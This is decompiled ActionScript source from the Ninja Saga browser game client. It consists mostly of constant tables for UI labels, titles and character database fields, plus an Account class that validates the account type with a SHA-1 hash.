"item"; public static const NA_EXCHANGE:String = "exchange"; public static const SKILL:String = "skill"; public static const ACADEMY_VIEW:String = "view"; public static const PLAY:String = "play"; public static const MAP:String = "map"; public static const NA_BLOODLINE:String = "bloodline"; public static const START:String = "start"; public static const MOUSE_OVER:String = "mover"; public static const SMOKE:String = "smoke"; public static const LOGIN:String = "login"; public static const DETAIL:String = "detail"; public static const ENGAGE:String = "engage"; public static const DEAD:String = "dead"; public static const MISSION_GRADE_LOCK:String = "lock"; public static const MAP_MISSION:String = "map_mission"; public static const RUN:String = "run"; public static const MISSION:String = "mission"; public static const EQUIPMENT:String = "equipment"; public static const NA_PET:String = "pet"; public static const MOUSE_OUT:String = "mout"; public static const OPTION:String = "option"; public static const HIT:String = "hit"; public static const ENABLE:String = "enable"; public static const PROFILE:String = "profile"; public static const STANDBY:String = "standby"; public static const SELCHAR:String = "selchar"; public static const MISSION_LIST:String = "list"; public static const SHOP_BUY:String = "buy"; public static const CRITICAL:String = "critical"; public static const ACCCOUT_UPGRADE:String = "upgrade"; public static const MC_PLAYER:String = "mc"; public static const INFO:String = "info"; public static const PREVIEW:String = "preview"; public static const CHARGE:String = "charge"; public static const STAND:String = "stand"; public static const BATTLE:String = "battle"; public static const ENGAGE_AMBUSH:String = "ambush"; public static const WIN:String = "win"; public static const DISABLE:String = "disable"; public static const IDLE:String = "idle"; public static const DIALOGUE:String = "dialogue"; public static const MISSION_GRADE_LIST:String = "grade"; public static const PANEL:String = "panel"; public static const NORMAL:String = "normal"; public static const ERROR:String = "error"; public static const HEAL:String = "heal"; public static const SHOP_SELL:String = "sell"; public static const SHOW:String = "show"; public static const PET:String = "pet"; } }//package ninjasaga.data package ninjasaga.data { public final class TitleData { public static const WIND:String = "wind"; public static const INVITESACCEPTED:String = "invitesaccepted"; public static const TRAININGHALL:String = "traininghall"; public static const RANKING:String = "ranking"; public static const AGILITY:String = "agility"; public static const EARTH:String = "earth"; public static const RANK:String = "rank"; public static const CLAN_TOURNAMENT_1ST_RUNNER_UP_REWARD_1:String = "clan_tournament_1st_runner_up_reward_1"; public static const CLAN_TOURNAMENT_1ST_RUNNER_UP_REWARD_2:String = "clan_tournament_1st_runner_up_reward_2"; public static const CLAN_TOURNAMENT_1ST_RUNNER_UP_REWARD_3:String = "clan_tournament_1st_runner_up_reward_3"; public static const FREEUSER:String = "freeuser"; public static const INVITECLANMEMBER:String = "inviteclanmember"; public static const CLANMASTER:String = "clanmaster"; public static const CLAN_TOURNAMENT_DATE_RANGE:String = "clan_tournament_date_range"; public static const SKILLS:String = "skills"; public static const LINKEDPET:String = "linkedpet"; public static const DAILYTASK_CHALLENGE:String = "dailytask_challenge"; public static const TEMPLE:String = "temple"; public static const BP:String = "bp"; public static const NEXTLEVEL:String = "nextlevel"; public static const ACCOUNTSTATUS:String = "accountstatus"; public static const INCREASEMAXSTAMINA:String = "increasemaxstamina"; public static const GOLD:String = "gold"; public static const CP:String = "cp"; public static const TOKENTOGOLD:String = "tokentogold"; public static const TOKENREQUIRED:String = "tokenrequired"; public static const REPUTATION:String = "reputation"; public static const HOTSPRING:String = "hotspring"; public static const OPTION:String = "option"; public static const CLAN_TOURNAMENT_REPUTATION_DESCRIPTION:String = "clan_tournament_reputation_desctiption"; public static const RESTORATION:String = "restoration"; public static const JUTSU:String = "jutsu"; public static const ITEMS2:String = "items2"; public static const MAILBOX:String = "mailbox"; public static const RECRUITFRIENDS:String = "recruitfriends"; public static const DISCONNECT:String = "disconnect"; public static const HAIRCOLOR:String = "haircolor"; public static const CURRENTUSER:String = "currentuser"; public static const EMPTYSLOT:String = "emptyslot"; public static const VISITFRIENDTRAININGTIME:String = "visitfriendtrainingtime"; public static const VISITFRIENDPROGRESS:String = "visitfriendprogress"; public static const PRIVATEROOM:String = "privateroom"; public static const VISITFRIENDREMAININGTIME:String = "visitfriendremainingtime"; public static const THUNDER:String = "thunder"; public static const GOLDGAINED:String = "goldgained"; public static const DONATETOKEN:String = "donatetoken"; public static const BLOODLINE:String = "bloodline"; public static const CREATECLANFEE:String = "createclanfee"; public static const USERNAME:String = "username"; public static const DONATABLETOKEN:String = "donatabletoken"; public static const SOUND:String = "sound"; public static const MEMBERS:String = "members"; public static const WATER:String = "water"; public static const LEVELUP:String = "levelup"; public static const CLANRANKING:String = "clanranking"; public static const INSTANTLEARN:String = "instantlearn"; public static const HP:String = "hp"; public static const GOLDTODONATE:String = "goldtodonate"; public static const MISSIONSUCCESS:String = "missionsuccess"; public static const QUALITYMEDIUM:String = "qualitymedium"; public static const GRAPHICQUALITY:String = "graphicquality"; public static const CLAN_TOURNAMENT_4TH_RUNNER_UP_REWARD_1:String = "clan_tournament_4th_runner_up_reward_1"; public static const ID:String = "id"; public static const CLAN_TOURNAMENT_3TH_RUNNER_UP_TITLE:String = "clan_tournament_3th_runner_up_title"; public static const RAMEN:String = "ramen"; public static const AFFINITY:String = "affinity"; public static const CLAN_TOURNAMENT_4TH_RUNNER_UP_REWARD_2:String = "clan_tournament_4th_runner_up_reward_2"; public static const DAILYTASK_MISSION:String = "dailytask_mission"; public static const CHARACTERNAME:String = "charactername"; public static const BUYSTAMINA:String = "buystamina"; public static const MAX:String = "max"; public static const REQUESTCLAN:String = "requestclan"; public static const MOREMEMBERSLOTS:String = "morememberslots"; public static const OFF:String = "off"; public static const CLAN_TOURNAMENT_2ND_RUNNER_UP_REWARD_1:String = "clan_tournament_2nd_runner_up_reward_1"; public static const CLAN_TOURNAMENT_2ND_RUNNER_UP_REWARD_2:String = "clan_tournament_2nd_runner_up_reward_2"; public static const CLAN_TOURNAMENT_2ND_RUNNER_UP_REWARD_3:String = "clan_tournament_2nd_runner_up_reward_3"; public static const XPGAINED:String = "xpgained"; public static const PLEASESELECT:String = "pleaseselect"; public static const MISSIONSELECT:String = "missionselect"; public static const PLAYERNEXTLEVELPLAYER:String = "playernextlevel"; public static const FRIENDS:String = "friends"; public static const POINTLEFT:String = "pointleft"; public static const SAVE:String = "save"; public static const WITHNINJAEMBLEM:String = "withninjaemblem"; public static const ALL:String = "all"; public static const YOURTOKEN:String = "yourtoken"; public static const PROFILE:String = "profile"; public static const LV:String = "lv"; public static const SELECTCHARACTER:String = "selectcharacter"; public static const GEAR:String = "gear"; public static const CREATECHARACTER:String = "createcharacter"; public static const SHARETOFRIEND:String = "sharetofriend"; public static const PREMIMUSER:String = "premiumuser"; public static const TOKENS:String = "tokens"; public static const BODY:String = "body"; public static const FREEGIFT:String = "freegift"; public static const RARITY:String = "rarity"; public static const NE:String = "ne"; public static const CURRENTLEVEL:String = "currentlevel"; public static const OFFENSIVE:String = "offensive"; public static const CHAKRA:String = "chakra"; public static const INVITEREWARDTITLE:String = "inviterewardtitle"; public static const AVGLVDIFF:String = "avglvdiff"; public static const TOKEN:String = "token"; public static const MYFRIENDSONLINE:String = "mufriendsonline"; public static const ON:String = "on"; public static const CLANNAME:String = "clanname"; public static const CHARACTERID:String = "characterid"; public static const YOUHAVE:String = "youhave"; public static const HEAL:String = "heal"; public static const TOURNAMENT:String = "tournament"; public static const CLAN_TOURNAMENT_REWARD_LABEL_TITLE:String = "clan_tournament_reward_label_title"; public static const CLANID:String = "clanid"; public static const QUALITYLOW:String = "qualitylow"; public static const VICTORY:String = "victory"; public static const VERSIONNUMBER:String = "versionnumber"; public static const NINJAEMBLEM:String = "ninjaemblem"; public static const CLANREWARDSELECTION:String = "clan_reward_selection"; public static const GETBP:String = "getbp"; public static const CLICKHERETOFIGHT:String = "clickheretofight"; public static const MALE:String = "male"; public static const RECRUITCLANMEMBER:String = "recruitclanmember"; public static const WEAPON:String = "weapon"; public static const COMPLETED:String = "completed"; public static const SKILL:String = "skill"; public static const MIN:String = "min"; public static const DAILYLUCKYDRAW:String = "dailyluckydraw"; public static const PREMIUM:String = "premium"; public static const RANK_TENSAI_JOUNIN:String = "rank_tensai_jounin"; public static const FIRE:String = "fire"; public static const STAMINA:String = "stamina"; public static const SELECTASERVER:String = "selectaserver"; public static const TEAM:String = "team"; public static const BUY:String = "buy"; public static const FREE:String = "free"; public static const XPGAIN:String = "xpgain"; public static const NINJUTSU:String = "ninjutsu"; public static const CLAN_TOURNAMENT_3TH_RUNNER_UP_REWARD_1:String = "clan_tournament_3th_runner_up_reward_1"; public static const CLAN_TOURNAMENT_3TH_RUNNER_UP_REWARD_2:String = "clan_tournament_3th_runner_up_reward_2"; public static const OWNED:String = "owned"; public static const NAME:String = "name"; public static const CLANBATTLE:String = "clanbattle"; public static const INVITEREWARDNAME2:String = "inviterewardname2"; public static const INVITEREWARDNAME3:String = "inviterewardname3"; public static const INVITEREWARDNAME4:String = "inviterewardname4"; public static const INVITEREWARDNAME5:String = "inviterewardname5"; public static const INVITEREWARDNAME1:String = "inviterewardname1"; public static const PASSWORD:String = "password"; public static const CLAN_TOURNAMENT_2ND_RUNNER_UP_TITLE:String = "clan_tournament_2nd_runner_up_title"; public static const SUPPORTIVE:String = "supportive"; public static const CLAN_TOURNAMENT_CHAMPION_REWARD_1:String = "clan_tournament_champion_reward_1"; public static const CLAN_TOKEN:String = "clantoken"; public static const CLAN_TOURNAMENT_CHAMPION_REWARD_2:String = "clan_tournament_champion_reward_2"; public static const CLAN_TOURNAMENT_CHAMPION_REWARD_3:String = "clan_tournament_champion_reward_3"; public static const VS:String = "vs"; public static const TOTALMEMBER:String = "totalmember"; public static const GENDER:String = "gender"; public static const ACCOUNTTYPE:String = "accounttype"; public static const PLAYED:String = "played"; public static const BATTLERESULT:String = "battleresult"; public static const CLANIDSEARCH:String = "clanidsearch"; public static const NEWS:String = "news"; public static const DAILYTASK_RECRUIT:String = "dailytask_recruit"; public static const CLAN_TOURNAMENT_4TH_RUNNER_UP_TITLE:String = "clan_tournament_4th_runner_up_title"; public static const MEMBERRECRUITED:String = "memberrecruited"; public static const HAIRSTYLE:String = "hairstyle"; public static const XP:String = "xp"; public static const DAILYTASK:String = "dailytask"; public static const QUALITYHIGH:String = "qualityhigh"; public static const PROMOTIONALOFFER:String = "promotionaloffer"; public static const ITEM:String = "item"; public static const LOSE:String = "lose"; public static const YOURGOLD:String = "yourgold"; public static const TOTAL:String = "total"; public static const JOINACLAN:String = "joinaclan"; public static const REWARD:String = "reward"; public static const MAGATAMA:String = "magatama"; public static const PETS:String = "pets"; public static const SERVER:String = "server"; public static const QUALITYBEST:String = "qualitybest"; public static const FEMALE:String = "female"; public static const DONATEGOLD:String = "donategold"; public static const SELL:String = "sell"; public static const REMATCH:String = "rematch"; public static const VISITFRIENDEXPIRED:String = "visitfriendexpired"; public static const CLAN_TOURNAMENT_CHAMPION_TITLE:String = "clan_tournament_champion_title"; public static const LEVEL:String = "level"; public static const WINPERCENTAGE:String = "winpercentage"; public static const FEE:String = "fee"; public static const COOLDOWN:String = "cooldown"; public static const DAMAGE:String = "damage"; public static const COMMINGSOON:String = "commingsoon"; public static const MEMBERSLOTUPGRADE:String = "memberslotupgrade"; public static const ACCEPTREQUESTMEMBERSHIP:String = "acceptrequestmembership"; public static const REQUESTMEMBERSHIP:String = "requestmembership"; public static const CLOTHING:String = "clothing"; public static const CLAN_TOURNAMENT_1ST_RUNNER_UP_TITLE:String = "clan_tournament_1st_runner_up_title"; public static const REQUESTLIST:String = "requestlist"; public static const DONATION:String = "donation"; public static const CRITICAL:String = "critical"; public static const ITEMS:String = "items"; public static const BATTLESELECT:String = "battleselect"; public static const CLANGOLD:String = "clangold"; public static const DODGE:String = "dodge"; public static const WIN:String = "win"; public static const RANK_JOUNIN:String = "rank_jounin"; public static const SHARE:String = "share"; public static const CLAN_TOURNAMENT_LABEL_TITLE:String = "clan_tournament_label_title"; public static const UPGRADECOST:String = "upgradecost"; public static const USER:String = "user"; public static const COST:String = "cost"; public static const CHALLENGEFRIENDS:String = "challengefriends"; public static const DEFENSIVE:String = "defensive"; public static const DAILYTASK_XP:String = "dailytask_xp"; public static const SKINCOLOR:String = "skincolor"; public static const PETSEMPTYSLOT:String = "petemptyslot"; } }//package ninjasaga.data package ninjasaga.data { public class DBCharacterData { public static const SKIN_COLOR:String = "character_skin_color"; public static const SKILL_RESISTANCE:String = "character_skill_resistance"; public static const HP:String = "character_hp"; public static const NAME:String = "character_name"; public static const ACCOUNT_ID:String = "account_id"; public static const WIND:String = "character_wind"; public static const ALL_ATTRIBUTE_POINTS:Array = [FIRE, WATER, WIND, EARTH, LIGHTNING, TAIJUTSU, GENJUTSU, SUMMON, CONTROL]; public static const EYE_COLOR:String = "character_eye_color"; public static const ID:String = "character_id"; public static const ARMOR:String = "character_armor"; public static const SKILL_UNALLOCATED:String = "character_skill_unallocated"; public static const AGILITY:String = "character_speed"; public static const HAIR_COLOR:String = "character_hair_color"; public static const TAIJUTSU:String = "character_taijutsu"; public static const RANK:String = "character_rank"; public static const SESSION_PLAYTIME:String = "session_playtime"; public static const BODY_SET:String = "character_body_set"; public static const EARTH:String = "character_earth"; public static const SKILL_TALENT:String = "character_skill_talent"; public static const INVENTORY:String = "character_inventory"; public static const FIRE:String = "character_fire"; public static const CHAKRA:String = "character_chakra"; public static const INTELLIGENCE:String = "character_intelligence"; public static const STRENGTH:String = "character_strength"; public static const SKILLS:String = "character_skills"; public static const MAX_CP:String = "character_max_cp"; public static const GENDER:String = "character_gender"; public static const CONTROL:String = "character_control"; public static const STAMINA:String = "character_stamina"; public static const LIGHTNING:String = "character_lightning"; public static const FACE:String = "character_face"; public static const GOLD:String = "character_gold"; public static const SUMMON:String = "character_summon"; public static const HAIR:String = "character_hair"; public static const MAX_HP:String = "character_max_hp"; public static const LEVEL:String = "character_level"; public static const BLOODLINE:String = "character_bloodline"; public static const BODY_PARTS:String = "character_body_parts"; public static const CP:String = "character_cp"; public static const SKILL_RESISTANCE_UNALLOCATED:String = "character_skill_resistance_unallocated"; public static const WATER:String = "character_water"; public static const XP:String = "character_xp"; public static const GENJUTSU:String = "character_genjutsu"; } }//package ninjasaga.data package ninjasaga.data { public class AMFData { public static const STATUS_ERROR:String = "0"; public static const STATUS_SUCCESS:String = "1"; } }//package ninjasaga.data package ninjasaga { public class Account { public static const FREE:uint = 1; public static const PREMIUM:uint = 2; private static var account_session_key:String; private static var account_balance:int; private static var account_id:uint; private static var account_type:uint; private static var accountTypeHash:String; public static function getAccountType():uint{ if (accountTypeHash != Sha1Encrypt.encrypt(String(account_type))){ } else { return (account_type); }; Out.data("Account", "account type mismatch"); Central.main.submitData(); return (1); } public static function getAccountBalance():uint{ return (account_balance); } public static function getAccountSessionKey():String{ return (account_session_key); } public static function getAccountTypeNoVerify():uint{ return (account_type); } public static function setupAccount(_arg1:Array, _arg2:String):Boolean{ var _local3:String; account_session_key = _arg1[3]; if (!Central.main){ } else { _local3 = ((((_arg1[0] + "|") + _arg1[1]) + "|") + _arg1[2]); if (Central.main.getHash(_local3) == _arg2){ } else { return (false); }; }; if (_arg1[0] > 0){ account_id = _arg1[0]; accountTypeHash = Sha1Encrypt.encrypt(String(_arg1[1])); account_type = _arg1[1]; account_balance = _arg1[2]; return (true); }; return (false); } public static function getAccountId():uint{ return (account_id); } public static function set balance(_arg1:int):void{ account_balance = _arg1; } } }//package ninjasaga